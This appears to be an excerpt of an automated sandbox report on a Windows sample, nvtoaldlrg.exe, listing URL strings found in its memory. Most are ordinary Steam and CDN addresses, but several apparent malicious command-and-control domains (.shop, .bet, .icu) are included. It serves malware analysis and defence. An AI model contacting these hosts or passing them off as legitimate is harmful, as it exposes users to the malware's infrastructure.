          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combin
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&l=e
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://featureccus.shop:443/bdMAn
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/
          Source: nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/bSHsyZD
          Source: nvtoaldlrg.exe, 00000000.00000003.1045651117.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048195980.00000000044AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/bSHsyZDC
          Source: nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet:443/bSHsyZDal
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu:443/bdWUaicrosoft
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://latchclan.shop:443/Wjquw
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/%M
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/-M
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/5M2Ps
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/=M:PA
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/EB
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/F
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/MB
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/System32
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
